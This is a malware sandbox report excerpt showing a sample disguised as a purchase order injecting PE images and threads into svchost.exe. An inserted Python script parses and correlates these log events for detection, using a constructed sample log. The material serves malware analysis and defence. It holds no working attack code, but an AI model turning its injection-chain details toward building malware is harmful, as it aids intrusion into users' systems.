Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: D00000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: D40000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: D80000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: DC0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: E00000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: E40000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: E80000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: EC0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: F00000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: F40000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: F80000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: FC0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1000000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1040000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1080000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 10C0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1100000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1140000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1180000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 11C0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1200000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1240000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1280000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 12C0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3310000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3350000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3390000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 33D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3410000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3450000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3490000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 34D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3510000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3550000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3580000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3700000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3740000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3780000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 37C0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 37F0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5130000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5170000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 51B0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 51E0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5260000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 53B0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 53F0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5420000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 55A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 55E0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5620000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5660000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 56A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 56E0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5710000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5890000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 58D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5910000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5950000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5990000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 59D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A10000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A50000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A90000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5AD0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B10000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B50000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B90000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5BD0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C10000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C50000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C90000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5CD0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D10000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D50000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D90000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5DD0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E10000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E50000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E90000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5ED0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F10000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F50000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F90000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 5FD0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6010000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6050000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6090000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 60D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6110000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6150000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6190000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 61D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6200000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6380000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 63C0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6400000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6440000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6480000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 64B0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6630000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6660000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 67E0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6820000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6860000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 68A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 68E0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6920000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6960000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 69A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 69D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6B50000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 6B70000
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 50480000 value starts with: 4D5A
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Users\user\Desktop\New Order PO20011046.exe base: 400000 value starts with: 4D5A
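The three event classes the report lists for this sample, an RWX allocation in svchost.exe, a write whose first bytes are 4D5A (the "MZ" DOS header of a PE image), and a thread started at an address inside one of those regions, are the allocate-write-execute chain of classic PE injection. Note that the second "Memory written" entry has the sample itself as target: the 4D5A write at 400000 is the sample overwriting its own image base with a new PE, not a write into svchost.exe. The following Python script is an added example, not part of the Joe Sandbox report, that parses lines in the report's "Source: ... <event>: ..." format and correlates them per target process. The sample lines it runs on are constructed for illustration (they mirror the report's format but are not copied from it), the separator between source and event is accepted with or without the " | ", and, because the report gives no region sizes, a thread counts as "in an RWX region" only when its EIP equals an allocated base (an assumption of this example).

```python
"""Correlate sandbox memory events into an injection chain.

Links RWX allocations, memory writes carrying the 4D5A ("MZ") marker and
thread starts in the same target process.  Example code; the log lines
below are constructed to match the report's line format.
"""
import re
from collections import defaultdict

# Constructed sample (not taken from the report); the "|" separator is optional.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: FC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1000000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 3580000 protect: page read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: FC0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 50480000 value starts with: 4D5A
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Users\user\Desktop\New Order PO20011046.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: FC0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1000000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 3580000
"""

PE_MAGIC = "4D5A"                                 # "MZ", start of a DOS/PE header
RWX_TEXT = "page execute and read and write"      # PAGE_EXECUTE_READWRITE as the report spells it

# Source path may contain spaces, so stop at the first event keyword.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*"
    r"(?P<event>Memory allocated|Memory written|Thread created):\s*(?P<rest>.+)$"
)
ALLOC_RE = re.compile(r"^(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)\s+protect:\s*(?P<prot>.+)$")
WRITE_RE = re.compile(
    r"^(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
    r"(?:\s+value starts with:\s*(?P<magic>[0-9A-Fa-f]+))?$"
)
THREAD_RE = re.compile(r"^(?P<target>.+?)\s+EIP:\s*(?P<eip>[0-9A-Fa-f]+)$")
SUB_RE = {"Memory allocated": ALLOC_RE, "Memory written": WRITE_RE, "Thread created": THREAD_RE}


def parse_events(log_text):
    """Yield (source, event, fields) for every recognised line; ignore the rest."""
    for raw in log_text.splitlines():
        m = EVENT_RE.match(raw.strip())
        if not m:
            continue
        d = SUB_RE[m.group("event")].match(m.group("rest"))
        if d:
            yield m.group("src"), m.group("event"), d.groupdict()


def analyze(log_text):
    """Correlate allocations, writes and thread starts per target process."""
    rwx = defaultdict(set)      # target -> {base of RWX allocation}
    writes = defaultdict(dict)  # target -> {base: first bytes or None}
    threads = []                # (target, eip)
    sources = set()
    for src, event, f in parse_events(log_text):
        sources.add(src)
        if event == "Memory allocated":
            if f["prot"].strip().lower() == RWX_TEXT:
                rwx[f["target"]].add(int(f["base"], 16))
        elif event == "Memory written":
            writes[f["target"]][int(f["base"], 16)] = (f["magic"] or "").upper() or None
        else:
            threads.append((f["target"], int(f["eip"], 16)))

    pe_writes = sorted((t, b) for t, ws in writes.items()
                       for b, magic in ws.items() if magic and magic.startswith(PE_MAGIC))
    return {
        "rwx_regions": {t: len(bs) for t, bs in rwx.items()},
        "pe_writes": pe_writes,
        # a PE written by a process into itself: in-place replacement of its own image
        "self_image_overwrite": [(t, b) for t, b in pe_writes if t in sources],
        # thread entry point equals an RWX base we saw allocated in that target (assumption: no sizes)
        "threads_in_rwx": sorted((t, e) for t, e in threads if e in rwx.get(t, ())),
        "threads_elsewhere": sorted((t, e) for t, e in threads if e not in rwx.get(t, ())),
    }


def verdict(findings):
    """Render the correlated findings as analyst-readable conclusions."""
    notes = []
    for target, base in findings["pe_writes"]:
        if (target, base) in findings["self_image_overwrite"]:
            notes.append(f"PE image written over own image base {base:#x} in {target} (in-place unpacking)")
        else:
            notes.append(f"PE image (MZ) written into {target} at {base:#x} (PE injection)")
    for target, eip in findings["threads_in_rwx"]:
        notes.append(f"thread started at {eip:#x}, an RWX region allocated in {target} (thread injection)")
    return notes


if __name__ == "__main__":
    for note in verdict(analyze(SAMPLE_LOG)):
        print(note)
```

Run against a full report export, the script turns a few hundred individual event lines into a handful of conclusions: how many RWX regions were carved out per target, which writes carried a PE header, which thread entry points land in attacker-allocated memory, and which threads (the 3580000 one in the constructed sample, allocated read/write only) need a manual look because their entry point does not match any RWX allocation.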
Writes to foreign memory regions
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 180000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 190000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 1A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 1F0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 440000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 450000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 460000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 470000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 480000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 490000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 4A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 4B0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 4C0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 4D0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 4E0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: B10000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: B20000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: B30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: ED0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F50000
